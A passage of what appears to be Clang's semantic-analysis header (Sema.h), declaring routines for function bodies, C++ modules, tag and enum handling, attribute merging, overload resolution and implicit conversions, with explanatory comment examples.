/// parsing a different function), for instance, if it's constexpr in C++11
/// or has an 'auto' return type in C++14. These cases are essentially bugs.
bool canDelayFunctionBody(const Declarator &D);
/// Determine whether we can skip parsing the body of a function
/// definition, assuming we don't care about analyzing its body or emitting
/// code for that function.
///
/// This will be \c false only if we may need the body of the function in
/// order to parse the rest of the program (for instance, if it is
/// \c constexpr in C++11 or has an 'auto' return type in C++14).
bool canSkipFunctionBody(Decl *D);
void computeNRVO(Stmt *Body, sema::FunctionScopeInfo *Scope);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body, bool IsInstantiation);
Decl *ActOnSkippedFunctionBody(Decl *Decl);
void ActOnFinishInlineFunctionDef(FunctionDecl *D);
/// ActOnFinishDelayedAttribute - Invoked when we have finished parsing an
/// attribute for which parsing is delayed.
void ActOnFinishDelayedAttribute(Scope *S, Decl *D, ParsedAttributes &Attrs);
/// Diagnose any unused parameters in the given sequence of
/// ParmVarDecl pointers.
void DiagnoseUnusedParameters(ArrayRef<ParmVarDecl *> Parameters);
/// Diagnose whether the size of parameters or return value of a
/// function or obj-c method definition is pass-by-value and larger than a
/// specified threshold.
void
DiagnoseSizeOfParametersAndReturnValue(ArrayRef<ParmVarDecl *> Parameters,
QualType ReturnTy, NamedDecl *D);
void DiagnoseInvalidJumps(Stmt *Body);
Decl *ActOnFileScopeAsmDecl(Expr *expr,
SourceLocation AsmLoc,
SourceLocation RParenLoc);
/// Handle a C++11 empty-declaration and attribute-declaration.
Decl *ActOnEmptyDeclaration(Scope *S, const ParsedAttributesView &AttrList,
SourceLocation SemiLoc);
enum class ModuleDeclKind {
Interface, ///< 'export module X;'
Implementation, ///< 'module X;'
};
/// The parser has processed a module-declaration that begins the definition
/// of a module interface or implementation.
DeclGroupPtrTy ActOnModuleDecl(SourceLocation StartLoc,
SourceLocation ModuleLoc, ModuleDeclKind MDK,
ModuleIdPath Path, bool IsFirstDecl);
/// The parser has processed a global-module-fragment declaration that begins
/// the definition of the global module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
DeclGroupPtrTy ActOnGlobalModuleFragmentDecl(SourceLocation ModuleLoc);
/// The parser has processed a private-module-fragment declaration that begins
/// the definition of the private module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
/// \param PrivateLoc The location of the 'private' keyword.
DeclGroupPtrTy ActOnPrivateModuleFragmentDecl(SourceLocation ModuleLoc,
SourceLocation PrivateLoc);
/// The parser has processed a module import declaration.
///
/// \param StartLoc The location of the first token in the declaration. This
/// could be the location of an '@', 'export', or 'import'.
/// \param ExportLoc The location of the 'export' keyword, if any.
/// \param ImportLoc The location of the 'import' keyword.
/// \param Path The module access path.
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, ModuleIdPath Path);
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, Module *M,
ModuleIdPath Path = {});
/// The parser has processed a module import translated from a
/// #include or similar preprocessing directive.
void ActOnModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
void BuildModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has entered a submodule.
void ActOnModuleBegin(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has left a submodule.
void ActOnModuleEnd(SourceLocation DirectiveLoc, Module *Mod);
/// Create an implicit import of the given module at the given
/// source location, for error recovery, if possible.
///
/// This routine is typically used when an entity found by name lookup
/// is actually hidden within a module that we know about but the user
/// has forgotten to import.
void createImplicitModuleImportForErrorRecovery(SourceLocation Loc,
Module *Mod);
/// Kinds of missing import. Note, the values of these enumerators correspond
/// to %select values in diagnostics.
enum class MissingImportKind {
Declaration,
Definition,
DefaultArgument,
ExplicitSpecialization,
PartialSpecialization
};
/// Diagnose that the specified declaration needs to be visible but
/// isn't, and suggest a module import that would resolve the problem.
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
MissingImportKind MIK, bool Recover = true);
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
SourceLocation DeclLoc, ArrayRef<Module *> Modules,
MissingImportKind MIK, bool Recover);
Decl *ActOnStartExportDecl(Scope *S, SourceLocation ExportLoc,
SourceLocation LBraceLoc);
Decl *ActOnFinishExportDecl(Scope *S, Decl *ExportDecl,
SourceLocation RBraceLoc);
/// We've found a use of a templated declaration that would trigger an
/// implicit instantiation. Check that any relevant explicit specializations
/// and partial specializations are visible, and diagnose if not.
void checkSpecializationVisibility(SourceLocation Loc, NamedDecl *Spec);
/// We've found a use of a template specialization that would select a
/// partial specialization. Check that the partial specialization is visible,
/// and diagnose if not.
void checkPartialSpecializationVisibility(SourceLocation Loc,
NamedDecl *Spec);
/// Retrieve a suitable printing policy for diagnostics.
PrintingPolicy getPrintingPolicy() const {
return getPrintingPolicy(Context, PP);
}
/// Retrieve a suitable printing policy for diagnostics.
static PrintingPolicy getPrintingPolicy(const ASTContext &Ctx,
const Preprocessor &PP);
/// Scope actions.
void ActOnPopScope(SourceLocation Loc, Scope *S);
void ActOnTranslationUnitScope(Scope *S);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
RecordDecl *&AnonRecord);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
MultiTemplateParamsArg TemplateParams,
bool IsExplicitInstantiation,
RecordDecl *&AnonRecord);
Decl *BuildAnonymousStructOrUnion(Scope *S, DeclSpec &DS,
AccessSpecifier AS,
RecordDecl *Record,
const PrintingPolicy &Policy);
Decl *BuildMicrosoftCAnonymousStruct(Scope *S, DeclSpec &DS,
RecordDecl *Record);
/// Common ways to introduce type names without a tag for use in diagnostics.
/// Keep in sync with err_tag_reference_non_tag.
enum NonTagKind {
NTK_NonStruct,
NTK_NonClass,
NTK_NonUnion,
NTK_NonEnum,
NTK_Typedef,
NTK_TypeAlias,
NTK_Template,
NTK_TypeAliasTemplate,
NTK_TemplateTemplateArgument,
};
/// Given a non-tag type declaration, returns an enum useful for indicating
/// what kind of non-tag type this is.
NonTagKind getNonTagTypeDeclKind(const Decl *D, TagTypeKind TTK);
bool isAcceptableTagRedeclaration(const TagDecl *Previous,
TagTypeKind NewTag, bool isDefinition,
SourceLocation NewTagLoc,
const IdentifierInfo *Name);
enum TagUseKind {
TUK_Reference, // Reference to a tag: 'struct foo *X;'
TUK_Declaration, // Fwd decl of a tag: 'struct foo;'
TUK_Definition, // Definition of a tag: 'struct foo { int X; } Y;'
TUK_Friend // Friend declaration: 'friend struct foo;'
};
Decl *ActOnTag(Scope *S, unsigned TagSpec, TagUseKind TUK,
SourceLocation KWLoc, CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc, const ParsedAttributesView &Attr,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
MultiTemplateParamsArg TemplateParameterLists, bool &OwnedDecl,
bool &IsDependent, SourceLocation ScopedEnumKWLoc,
bool ScopedEnumUsesClassTag, TypeResult UnderlyingType,
bool IsTypeSpecifier, bool IsTemplateParamOrArg,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnTemplatedFriendTag(Scope *S, SourceLocation FriendLoc,
unsigned TagSpec, SourceLocation TagLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TempParamLists);
TypeResult ActOnDependentTag(Scope *S,
unsigned TagSpec,
TagUseKind TUK,
const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation TagLoc,
SourceLocation NameLoc);
void ActOnDefs(Scope *S, Decl *TagD, SourceLocation DeclStart,
IdentifierInfo *ClassName,
SmallVectorImpl<Decl *> &Decls);
Decl *ActOnField(Scope *S, Decl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth);
FieldDecl *HandleField(Scope *S, RecordDecl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS);
MSPropertyDecl *HandleMSProperty(Scope *S, RecordDecl *TagD,
SourceLocation DeclStart, Declarator &D,
Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS,
const ParsedAttr &MSPropertyAttr);
FieldDecl *CheckFieldDecl(DeclarationName Name, QualType T,
TypeSourceInfo *TInfo,
RecordDecl *Record, SourceLocation Loc,
bool Mutable, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
SourceLocation TSSL,
AccessSpecifier AS, NamedDecl *PrevDecl,
Declarator *D = nullptr);
bool CheckNontrivialField(FieldDecl *FD);
void DiagnoseNontrivial(const CXXRecordDecl *Record, CXXSpecialMember CSM);
enum TrivialABIHandling {
/// The triviality of a method unaffected by "trivial_abi".
TAH_IgnoreTrivialABI,
/// The triviality of a method affected by "trivial_abi".
TAH_ConsiderTrivialABI
};
bool SpecialMemberIsTrivial(CXXMethodDecl *MD, CXXSpecialMember CSM,
TrivialABIHandling TAH = TAH_IgnoreTrivialABI,
bool Diagnose = false);
/// For a defaulted function, the kind of defaulted function that it is.
class DefaultedFunctionKind {
CXXSpecialMember SpecialMember : 8;
DefaultedComparisonKind Comparison : 8;
public:
DefaultedFunctionKind()
: SpecialMember(CXXInvalid), Comparison(DefaultedComparisonKind::None) {
}
DefaultedFunctionKind(CXXSpecialMember CSM)
: SpecialMember(CSM), Comparison(DefaultedComparisonKind::None) {}
DefaultedFunctionKind(DefaultedComparisonKind Comp)
: SpecialMember(CXXInvalid), Comparison(Comp) {}
bool isSpecialMember() const { return SpecialMember != CXXInvalid; }
bool isComparison() const {
return Comparison != DefaultedComparisonKind::None;
}
explicit operator bool() const {
return isSpecialMember() || isComparison();
}
CXXSpecialMember asSpecialMember() const { return SpecialMember; }
DefaultedComparisonKind asComparison() const { return Comparison; }
/// Get the index of this function kind for use in diagnostics.
unsigned getDiagnosticIndex() const {
static_assert(CXXInvalid > CXXDestructor,
"invalid should have highest index");
static_assert((unsigned)DefaultedComparisonKind::None == 0,
"none should be equal to zero");
return SpecialMember + (unsigned)Comparison;
}
};
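// Classification sketch:
//
//   struct Foo {
//     Foo() = default;                              // isSpecialMember()
//     bool operator==(const Foo &) const = default; // isComparison()
//   };
//
// getDiagnosticIndex() folds both kinds into one %select space: special
// members use their CXXSpecialMember value, and comparison kinds are offset
// past CXXInvalid.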
DefaultedFunctionKind getDefaultedFunctionKind(const FunctionDecl *FD);
CXXSpecialMember getSpecialMember(const CXXMethodDecl *MD) {
return getDefaultedFunctionKind(MD).asSpecialMember();
}
DefaultedComparisonKind getDefaultedComparisonKind(const FunctionDecl *FD) {
return getDefaultedFunctionKind(FD).asComparison();
}
void ActOnLastBitfield(SourceLocation DeclStart,
SmallVectorImpl<Decl *> &AllIvarDecls);
Decl *ActOnIvar(Scope *S, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
tok::ObjCKeywordKind visibility);
// This is used for both record definitions and ObjC interface declarations.
void ActOnFields(Scope *S, SourceLocation RecLoc, Decl *TagDecl,
ArrayRef<Decl *> Fields, SourceLocation LBrac,
SourceLocation RBrac, const ParsedAttributesView &AttrList);
/// ActOnTagStartDefinition - Invoked when we have entered the
/// scope of a tag's definition (e.g., for an enumeration, class,
/// struct, or union).
void ActOnTagStartDefinition(Scope *S, Decl *TagDecl);
/// Perform ODR-like check for C/ObjC when merging tag types from modules.
/// Unlike in C++, we actually parse the body and reject or error out in
/// case of a structural mismatch.
bool ActOnDuplicateDefinition(DeclSpec &DS, Decl *Prev,
SkipBodyInfo &SkipBody);
typedef void *SkippedDefinitionContext;
/// Invoked when we enter a tag definition that we're skipping.
SkippedDefinitionContext ActOnTagStartSkippedDefinition(Scope *S, Decl *TD);
Decl *ActOnObjCContainerStartDefinition(Decl *IDecl);
/// ActOnStartCXXMemberDeclarations - Invoked when we have parsed a
/// C++ record definition's base-specifiers clause and are starting its
/// member declarations.
void ActOnStartCXXMemberDeclarations(Scope *S, Decl *TagDecl,
SourceLocation FinalLoc,
bool IsFinalSpelledSealed,
SourceLocation LBraceLoc);
/// ActOnTagFinishDefinition - Invoked once we have finished parsing
/// the definition of a tag (enumeration, class, struct, or union).
void ActOnTagFinishDefinition(Scope *S, Decl *TagDecl,
SourceRange BraceRange);
void ActOnTagFinishSkippedDefinition(SkippedDefinitionContext Context);
void ActOnObjCContainerFinishDefinition();
/// Invoked when we must temporarily exit the objective-c container
/// scope for parsing/looking-up C constructs.
///
/// Must be followed by a call to \see ActOnObjCReenterContainerContext
void ActOnObjCTemporaryExitContainerContext(DeclContext *DC);
void ActOnObjCReenterContainerContext(DeclContext *DC);
/// ActOnTagDefinitionError - Invoked when there was an unrecoverable
/// error parsing the definition of a tag.
void ActOnTagDefinitionError(Scope *S, Decl *TagDecl);
EnumConstantDecl *CheckEnumConstant(EnumDecl *Enum,
EnumConstantDecl *LastEnumConst,
SourceLocation IdLoc,
IdentifierInfo *Id,
Expr *val);
bool CheckEnumUnderlyingType(TypeSourceInfo *TI);
bool CheckEnumRedeclaration(SourceLocation EnumLoc, bool IsScoped,
QualType EnumUnderlyingTy, bool IsFixed,
const EnumDecl *Prev);
/// Determine whether the body of an anonymous enumeration should be skipped.
/// \param II The name of the first enumerator.
SkipBodyInfo shouldSkipAnonEnumBody(Scope *S, IdentifierInfo *II,
SourceLocation IILoc);
Decl *ActOnEnumConstant(Scope *S, Decl *EnumDecl, Decl *LastEnumConstant,
SourceLocation IdLoc, IdentifierInfo *Id,
const ParsedAttributesView &Attrs,
SourceLocation EqualLoc, Expr *Val);
void ActOnEnumBody(SourceLocation EnumLoc, SourceRange BraceRange,
Decl *EnumDecl, ArrayRef<Decl *> Elements, Scope *S,
const ParsedAttributesView &Attr);
DeclContext *getContainingDC(DeclContext *DC);
/// Set the current declaration context until it gets popped.
void PushDeclContext(Scope *S, DeclContext *DC);
void PopDeclContext();
/// EnterDeclaratorContext - Used when we must lookup names in the context
/// of a declarator's nested name specifier.
void EnterDeclaratorContext(Scope *S, DeclContext *DC);
void ExitDeclaratorContext(Scope *S);
/// Push the parameters of D, which must be a function, into scope.
void ActOnReenterFunctionContext(Scope* S, Decl* D);
void ActOnExitFunctionContext();
DeclContext *getFunctionLevelDeclContext();
/// getCurFunctionDecl - If inside of a function body, this returns a pointer
/// to the function decl for the function being parsed. If we're currently
/// in a 'block', this returns the containing context.
FunctionDecl *getCurFunctionDecl();
/// getCurMethodDecl - If inside of a method body, this returns a pointer to
/// the method decl for the method being parsed. If we're currently
/// in a 'block', this returns the containing context.
ObjCMethodDecl *getCurMethodDecl();
/// getCurFunctionOrMethodDecl - Return the Decl for the current ObjC method
/// or C function we're in, otherwise return null. If we're currently
/// in a 'block', this returns the containing context.
NamedDecl *getCurFunctionOrMethodDecl();
/// Add this decl to the scope shadowed decl chains.
void PushOnScopeChains(NamedDecl *D, Scope *S, bool AddToContext = true);
/// isDeclInScope - If 'Ctx' is a function/method, isDeclInScope returns true
/// if 'D' is in Scope 'S', otherwise 'S' is ignored and isDeclInScope returns
/// true if 'D' belongs to the given declaration context.
///
/// \param AllowInlineNamespace If \c true, allow the declaration to be in the
/// enclosing namespace set of the context, rather than contained
/// directly within it.
bool isDeclInScope(NamedDecl *D, DeclContext *Ctx, Scope *S = nullptr,
bool AllowInlineNamespace = false);
/// Finds the scope corresponding to the given decl context, if it
/// happens to be an enclosing scope. Otherwise return NULL.
static Scope *getScopeForDeclContext(Scope *S, DeclContext *DC);
/// Subroutines of ActOnDeclarator().
TypedefDecl *ParseTypedefDecl(Scope *S, Declarator &D, QualType T,
TypeSourceInfo *TInfo);
bool isIncompatibleTypedef(TypeDecl *Old, TypedefNameDecl *New);
/// Describes the kind of merge to perform for availability
/// attributes (including "deprecated", "unavailable", and "availability").
enum AvailabilityMergeKind {
/// Don't merge availability attributes at all.
AMK_None,
/// Merge availability attributes for a redeclaration, which requires
/// an exact match.
AMK_Redeclaration,
/// Merge availability attributes for an override, which requires
/// an exact match or a weakening of constraints.
AMK_Override,
/// Merge availability attributes for an implementation of
/// a protocol requirement.
AMK_ProtocolImplementation,
};
/// Describes the kind of priority given to an availability attribute.
///
/// The sum of priorities determines the final priority of the attribute.
/// The final priority determines how the attribute will be merged.
/// An attribute with a lower priority will always remove higher priority
/// attributes for the specified platform when it is being applied. An
/// attribute with a higher priority will not be applied if the declaration
/// already has an availability attribute with a lower priority for the
/// specified platform. The final priority values are not expected to match
/// the values in this enumeration, but instead should be treated as a plain
/// integer value. This enumeration just names the priority weights that are
/// used to calculate that final value.
enum AvailabilityPriority : int {
/// The availability attribute was specified explicitly next to the
/// declaration.
AP_Explicit = 0,
/// The availability attribute was applied using '#pragma clang attribute'.
AP_PragmaClangAttribute = 1,
/// The availability attribute for a specific platform was inferred from
/// an availability attribute for another platform.
AP_InferredFromOtherPlatform = 2
};
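// Priority sketch (attribute spellings illustrative): an explicit attribute
// (weight 0) outranks one injected via '#pragma clang attribute' (weight 1),
// which outranks one inferred from another platform (weight 2); when
// merging, the lower final priority wins.
//
//   #pragma clang attribute push (__attribute__((availability(
//       macos, introduced=10.12))), apply_to = function)
//   void f(void) __attribute__((availability(macos, introduced=10.13)));
//   // f keeps introduced=10.13: AP_Explicit beats AP_PragmaClangAttribute.
//   #pragma clang attribute pop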
/// Attribute merging methods. Return true if a new attribute was added.
AvailabilityAttr *
mergeAvailabilityAttr(NamedDecl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Platform, bool Implicit,
VersionTuple Introduced, VersionTuple Deprecated,
VersionTuple Obsoleted, bool IsUnavailable,
StringRef Message, bool IsStrict, StringRef Replacement,
AvailabilityMergeKind AMK, int Priority);
TypeVisibilityAttr *
mergeTypeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
TypeVisibilityAttr::VisibilityType Vis);
VisibilityAttr *mergeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
VisibilityAttr::VisibilityType Vis);
UuidAttr *mergeUuidAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Uuid);
DLLImportAttr *mergeDLLImportAttr(Decl *D, const AttributeCommonInfo &CI);
DLLExportAttr *mergeDLLExportAttr(Decl *D, const AttributeCommonInfo &CI);
MSInheritanceAttr *mergeMSInheritanceAttr(Decl *D,
const AttributeCommonInfo &CI,
bool BestCase,
MSInheritanceModel Model);
FormatAttr *mergeFormatAttr(Decl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Format, int FormatIdx,
int FirstArg);
SectionAttr *mergeSectionAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
CodeSegAttr *mergeCodeSegAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
AlwaysInlineAttr *mergeAlwaysInlineAttr(Decl *D,
const AttributeCommonInfo &CI,
const IdentifierInfo *Ident);
MinSizeAttr *mergeMinSizeAttr(Decl *D, const AttributeCommonInfo &CI);
NoSpeculativeLoadHardeningAttr *
mergeNoSpeculativeLoadHardeningAttr(Decl *D,
const NoSpeculativeLoadHardeningAttr &AL);
SpeculativeLoadHardeningAttr *
mergeSpeculativeLoadHardeningAttr(Decl *D,
const SpeculativeLoadHardeningAttr &AL);
OptimizeNoneAttr *mergeOptimizeNoneAttr(Decl *D,
const AttributeCommonInfo &CI);
SwiftNameAttr *mergeSwiftNameAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name, bool Override);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D, const ParsedAttr &AL);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D,
const InternalLinkageAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const ParsedAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const CommonAttr &AL);
void mergeDeclAttributes(NamedDecl *New, Decl *Old,
AvailabilityMergeKind AMK = AMK_Redeclaration);
void MergeTypedefNameDecl(Scope *S, TypedefNameDecl *New,
LookupResult &OldDecls);
bool MergeFunctionDecl(FunctionDecl *New, NamedDecl *&Old, Scope *S,
bool MergeTypeWithOld);
bool MergeCompatibleFunctionDecls(FunctionDecl *New, FunctionDecl *Old,
Scope *S, bool MergeTypeWithOld);
void mergeObjCMethodDecls(ObjCMethodDecl *New, ObjCMethodDecl *Old);
void MergeVarDecl(VarDecl *New, LookupResult &Previous);
void MergeVarDeclTypes(VarDecl *New, VarDecl *Old, bool MergeTypeWithOld);
void MergeVarDeclExceptionSpecs(VarDecl *New, VarDecl *Old);
bool checkVarDeclRedefinition(VarDecl *OldDefn, VarDecl *NewDefn);
void notePreviousDefinition(const NamedDecl *Old, SourceLocation New);
bool MergeCXXFunctionDecl(FunctionDecl *New, FunctionDecl *Old, Scope *S);
// AssignmentAction - This is used by all the assignment diagnostic functions
// to represent what is actually causing the operation
enum AssignmentAction {
AA_Assigning,
AA_Passing,
AA_Returning,
AA_Converting,
AA_Initializing,
AA_Sending,
AA_Casting,
AA_Passing_CFAudited
};
/// C++ Overloading.
enum OverloadKind {
/// This is a legitimate overload: the existing declarations are
/// functions or function templates with different signatures.
Ovl_Overload,
/// This is not an overload because the signature exactly matches
/// an existing declaration.
Ovl_Match,
/// This is not an overload because the lookup results contain a
/// non-function.
Ovl_NonFunction
};
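// In source terms (sketch):
//
//   void f(int);
//   void f(double);  // Ovl_Overload: distinct signature
//   void f(int);     // Ovl_Match: same signature, a redeclaration
//   // and if lookup for 'f' had found a variable instead: Ovl_NonFunction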
OverloadKind CheckOverload(Scope *S,
FunctionDecl *New,
const LookupResult &OldDecls,
NamedDecl *&OldDecl,
bool IsForUsingDecl);
bool IsOverload(FunctionDecl *New, FunctionDecl *Old, bool IsForUsingDecl,
bool ConsiderCudaAttrs = true);
ImplicitConversionSequence
TryImplicitConversion(Expr *From, QualType ToType,
bool SuppressUserConversions,
bool AllowExplicit,
bool InOverloadResolution,
bool CStyle,
bool AllowObjCWritebackConversion);
bool IsIntegralPromotion(Expr *From, QualType FromType, QualType ToType);
bool IsFloatingPointPromotion(QualType FromType, QualType ToType);
bool IsComplexPromotion(QualType FromType, QualType ToType);
bool IsPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCWritebackConversion(QualType FromType, QualType ToType,
QualType &ConvertedType);
bool IsBlockPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType);
bool FunctionParamTypesAreEqual(const FunctionProtoType *OldType,
const FunctionProtoType *NewType,
unsigned *ArgPos = nullptr);
void HandleFunctionTypeMismatch(PartialDiagnostic &PDiag,
QualType FromType, QualType ToType);
void maybeExtendBlockObject(ExprResult &E);
CastKind PrepareCastToObjCObjectPointer(ExprResult &E);
bool CheckPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath& BasePath,
bool IgnoreBaseAccess,
bool Diagnose = true);
bool IsMemberPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType &ConvertedType);
bool CheckMemberPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath &BasePath,
bool IgnoreBaseAccess);
bool IsQualificationConversion(QualType FromType, QualType ToType,
bool CStyle, bool &ObjCLifetimeConversion);
bool IsFunctionConversion(QualType FromType, QualType ToType,
QualType &ResultTy);
bool DiagnoseMultipleUserDefinedConversion(Expr *From, QualType ToType);
bool isSameOrCompatibleFunctionType(CanQualType Param, CanQualType Arg);
ExprResult PerformMoveOrCopyInitialization(const InitializedEntity &Entity,
const VarDecl *NRVOCandidate,
QualType ResultType,
Expr *Value,
bool AllowNRVO = true);
bool CanPerformAggregateInitializationForOverloadResolution(
const InitializedEntity &Entity, InitListExpr *From);
bool CanPerformCopyInitialization(const InitializedEntity &Entity,
ExprResult Init);
ExprResult PerformCopyInitialization(const InitializedEntity &Entity,
SourceLocation EqualLoc,
ExprResult Init,
bool TopLevelOfInitList = false,
bool AllowExplicit = false);
ExprResult PerformObjectArgumentInitialization(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
CXXMethodDecl *Method);
/// Check that the lifetime of the initializer (and its subobjects) is
/// sufficient for initializing the entity, and perform lifetime extension
/// (when permitted) if not.
void checkInitializerLifetime(const InitializedEntity &Entity, Expr *Init);
ExprResult PerformContextuallyConvertToBool(Expr *From);
ExprResult PerformContextuallyConvertToObjCPointer(Expr *From);
/// Contexts in which a converted constant expression is required.
enum CCEKind {
CCEK_CaseValue, ///< Expression in a case label.
CCEK_Enumerator, ///< Enumerator value with fixed underlying type.
CCEK_TemplateArg, ///< Value of a non-type template parameter.
CCEK_NewExpr, ///< Constant expression in a noptr-new-declarator.
CCEK_ConstexprIf, ///< Condition in a constexpr if statement.
CCEK_ExplicitBool ///< Condition in an explicit(bool) specifier.
};
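// The contexts above in source form (sketch, V a constant expression):
//
//   switch (n) { case V: ... }   // CCEK_CaseValue
//   enum E : char { A = V };     // CCEK_Enumerator
//   X<V> x;                      // CCEK_TemplateArg
//   new int[n][V];               // CCEK_NewExpr (noptr-new-declarator)
//   if constexpr (V) { ... }     // CCEK_ConstexprIf
//   explicit(V) Widget(int);     // CCEK_ExplicitBool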
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
llvm::APSInt &Value, CCEKind CCE);
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
APValue &Value, CCEKind CCE);
/// Abstract base class used to perform a contextual implicit
/// conversion from an expression to any type passing a filter.
class ContextualImplicitConverter {
public:
bool Suppress;
bool SuppressConversion;
ContextualImplicitConverter(bool Suppress = false,
bool SuppressConversion = false)
: Suppress(Suppress), SuppressConversion(SuppressConversion) {}
/// Determine whether the specified type is a valid destination type
/// for this conversion.
virtual bool match(QualType T) = 0;
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the expression has incomplete class type.
virtual SemaDiagnosticBuilder
diagnoseIncomplete(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the only matching conversion function
/// is explicit.
virtual SemaDiagnosticBuilder diagnoseExplicitConv(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
/// Emits a note for the explicit conversion function.
virtual SemaDiagnosticBuilder
noteExplicitConv(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when there are multiple possible conversion
/// functions.
virtual SemaDiagnosticBuilder
diagnoseAmbiguous(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a note for one of the candidate conversions.
virtual SemaDiagnosticBuilder
noteAmbiguous(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when we picked a conversion function
/// (for cases when we are not allowed to pick a conversion function).
virtual SemaDiagnosticBuilder diagnoseConversion(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
virtual ~ContextualImplicitConverter() {}
};
class ICEConvertDiagnoser : public ContextualImplicitConverter {
bool AllowScopedEnumerations;
public:
ICEConvertDiagnoser(bool AllowScopedEnumerations,
bool Suppress, bool SuppressConversion)
: ContextualImplicitConverter(Suppress, SuppressConversion),
AllowScopedEnumerations(AllowScopedEnumerations) {}
/// Match an integral or (possibly scoped) enumeration type.
bool match(QualType T) override;
SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) override {
return diagnoseNotInt(S, Loc, T);
}
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNotInt(Sema &S, SourceLocation Loc, QualType T) = 0;
};
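// Subclassing sketch (hypothetical diagnoser): a caller that needs an
// integral value, e.g. an array bound, overrides the pure virtual
// diagnose*/note* hooks and hands the object to
// PerformContextualImplicitConversion below.
//
//   struct BoundDiagnoser final : Sema::ICEConvertDiagnoser {
//     BoundDiagnoser()
//         : ICEConvertDiagnoser(/*AllowScopedEnumerations=*/false,
//                               /*Suppress=*/false,
//                               /*SuppressConversion=*/false) {}
//     // ... definitions of diagnoseNotInt, diagnoseIncomplete, etc. ...
//   } Diagnoser;
//   ExprResult Converted =
//       PerformContextualImplicitConversion(Loc, E, Diagnoser);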
/// Perform a contextual implicit conversion.
ExprResult PerformContextualImplicitConversion(
SourceLocation Loc, Expr *FromE, ContextualImplicitConverter &Converter);
enum ObjCSubscriptKind {
OS_Array,
OS_Dictionary,
OS_Error
};
ObjCSubscriptKind CheckSubscriptingKind(Expr *FromE);
// Note that LK_String is intentionally after the other literals, as
// this is used for diagnostics logic.
enum ObjCLiteralKind {
LK_Array,
LK_Dictionary,
LK_Numeric,
LK_Boxed,
LK_String,
LK_Block,
LK_None
};
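// The literal forms being classified (sketch):
//
//   @[ a, b ]   // LK_Array
//   @{ k : v }  // LK_Dictionary
//   @42         // LK_Numeric
//   @(expr)     // LK_Boxed
//   @"text"     // LK_String
//   ^{ ... }    // LK_Block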
ObjCLiteralKind CheckLiteralKind(Expr *FromE);
ExprResult PerformObjectMemberConversion(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
NamedDecl *Member);
// Members have to be NamespaceDecl* or TranslationUnitDecl*.
// TODO: make this a typesafe union.
typedef llvm::SmallSetVector<DeclContext *, 16> AssociatedNamespaceSet;
typedef llvm::SmallSetVector<CXXRecordDecl *, 16> AssociatedClassSet;
using ADLCallKind = CallExpr::ADLCallKind;
void AddOverloadCandidate(FunctionDecl *Function, DeclAccessPair FoundDecl,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
